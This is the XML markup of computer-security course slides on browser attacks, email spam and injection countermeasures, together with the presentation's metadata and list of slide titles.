        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filter and sanitize all user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to account for every potentially valid encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make no assumptions about the range of possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>user inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>nothing, check everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use access control mechanisms on backend servers, such as “stored procedures”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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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8683708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Spam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Experts estimate that 60% to 90% of all email is spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of spam:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advertising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pharmaceuticals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Links for malicious websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="837125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Spam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Laws against spam exist but are generally ineffective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email filters have become very effective for most spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Internet service providers use volume limitations to make spammers’ jobs more difficult</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254990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2ECB-10CC-5942-878E-891B26DEAA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Issues for Browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89734CB1-4680-3440-B102-A1AF636134D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular browsers support add-ins, extra code to add new features to the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>these add-ins themselves can include corrupting code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data display involves a rich command set </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controls rendering, positioning, motion, layering, invisibility.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C064201-7284-6F48-8048-6973B480663E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5118945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Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User education</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limited effectiveness and very subject to co-evolution with attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, Became more scientific over the years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with products like PhishMe automating the user training process and focusing on the worst offenders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PGP and S/MIME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cryptographic solutions that have seen very limited adoption after years on the market</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>solutions for encrypting and signing email</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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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810872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43463CA-4E59-494A-9AE7-13780A7533E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="C:\Users\Tzipi\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VEOHZFDL\googley-eye-birdie-has-questions[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599" y="2514600"/>
            <a:ext cx="3970097"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950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2ECB-10CC-5942-878E-891B26DEAA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Issues for Browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89734CB1-4680-3440-B102-A1AF636134D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser typically has the user privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can access any data on a user’s computer allows by access control restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data transfers to and from the user are invisible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Occur without the user’s knowledge or explicit permission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C064201-7284-6F48-8048-6973B480663E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2622271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CBF2-AE50-1E4E-B1BA-C8F7FACEE58D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C8A18B4-4BFC-B54C-A24E-BFECC30198B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks aim to: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Obtain sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., Account numbers or authentication passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Entice the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for example, using pop-up ads, or to install malware. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D47655-48AE-B441-9D40-126483708794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108900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99D2-2943-6648-BA90-105EBBFC94E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA600AF-EB4D-F84E-8B09-6812CE75860D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are three attack vectors against a browser:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go after the operating system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&gt; impede the browser’s correct and secure functioning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tackle the browser or one of its components, add-ons, or plug-ins 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&gt; its activity is altered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intercept or modify communication to or from the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3948F0-E6FB-9046-A6DC-5A6B404ADC55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1889781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2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15862</TotalTime>
  <Words>2648</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>345</Paragraphs>
  <Slides>61</Slides>
  <Notes>16</Notes>
  <HiddenSlides>2</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61</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="69" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>LiberationSans</vt:lpstr>
      <vt:lpstr>LiberationSans-Italic</vt:lpstr>
      <vt:lpstr>Clarity</vt:lpstr>
      <vt:lpstr>2_Clarity</vt:lpstr>
      <vt:lpstr>1_Clarity</vt:lpstr>
      <vt:lpstr>CISC 7320X - Computer Security </vt:lpstr>
      <vt:lpstr>Rise of the Hackers</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>Browsers</vt:lpstr>
      <vt:lpstr>Security Issues for Browsers</vt:lpstr>
      <vt:lpstr>Security Issues for Browsers</vt:lpstr>
      <vt:lpstr>Security Issues for Browsers</vt:lpstr>
      <vt:lpstr>Browser Attacks</vt:lpstr>
      <vt:lpstr>Browser Attacks</vt:lpstr>
      <vt:lpstr>Browser Vulnerabilities</vt:lpstr>
      <vt:lpstr>Browser Vulnerabilities</vt:lpstr>
      <vt:lpstr>Browser Attack Types</vt:lpstr>
      <vt:lpstr>Man-in-the-browser</vt:lpstr>
      <vt:lpstr>Man-in-the-browser</vt:lpstr>
      <vt:lpstr>Man-in-the-browser - Example</vt:lpstr>
      <vt:lpstr>Man-in-the-browser - Example</vt:lpstr>
      <vt:lpstr>SilentBanker</vt:lpstr>
      <vt:lpstr>Man-in-the-Browser</vt:lpstr>
      <vt:lpstr>SilentBanker</vt:lpstr>
      <vt:lpstr>Keystroke Logger</vt:lpstr>
      <vt:lpstr>Page-in-the-Middle</vt:lpstr>
      <vt:lpstr>Page-in-the-middle vs. Man-in-the-browser Attacks</vt:lpstr>
      <vt:lpstr>Program Download Substitution</vt:lpstr>
      <vt:lpstr>User-in-the-Middle</vt:lpstr>
      <vt:lpstr>User-in-the-Middle</vt:lpstr>
      <vt:lpstr>Successful Authentication</vt:lpstr>
      <vt:lpstr>Fake Website</vt:lpstr>
      <vt:lpstr>Fake Code</vt:lpstr>
      <vt:lpstr>Tracking Bug</vt:lpstr>
      <vt:lpstr>Tracking Bugs</vt:lpstr>
      <vt:lpstr>Most serious endpoint security incidents in the US (2016)</vt:lpstr>
      <vt:lpstr>Most serious endpoint security incidents in the US (2016)</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking Attacks </vt:lpstr>
      <vt:lpstr>Clickjacking Attacks </vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking Attacks </vt:lpstr>
      <vt:lpstr>Clickjacking Attacks</vt:lpstr>
      <vt:lpstr>Clickjacking Attacks</vt:lpstr>
      <vt:lpstr>Clickjacking Attacks</vt:lpstr>
      <vt:lpstr>Clickjacking Attacks</vt:lpstr>
      <vt:lpstr>Other Scenarios</vt:lpstr>
      <vt:lpstr>Cursorjacking</vt:lpstr>
      <vt:lpstr>Clickjacking Known Attacks</vt:lpstr>
      <vt:lpstr>Clickjacking Defenses</vt:lpstr>
      <vt:lpstr>Clickjacking Defenses</vt:lpstr>
      <vt:lpstr>Clickjacking Defenses - Sitekeys</vt:lpstr>
      <vt:lpstr>Clickjacking Defenses - Sitekeys</vt:lpstr>
      <vt:lpstr>Drive-By Download</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Dot-Dot-Slash</vt:lpstr>
      <vt:lpstr>Server-Side Include (SSI)</vt:lpstr>
      <vt:lpstr>Countermeasures to Injections</vt:lpstr>
      <vt:lpstr>Email Spam</vt:lpstr>
      <vt:lpstr>Email Spam</vt:lpstr>
      <vt:lpstr>Countermeasures</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Qmulos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Tzipora Halevi</cp:lastModifiedBy>
  <cp:revision>1417</cp:revision>
  <cp:lastPrinted>2019-03-23T12:53:08Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-14T01:17:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-23T12:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>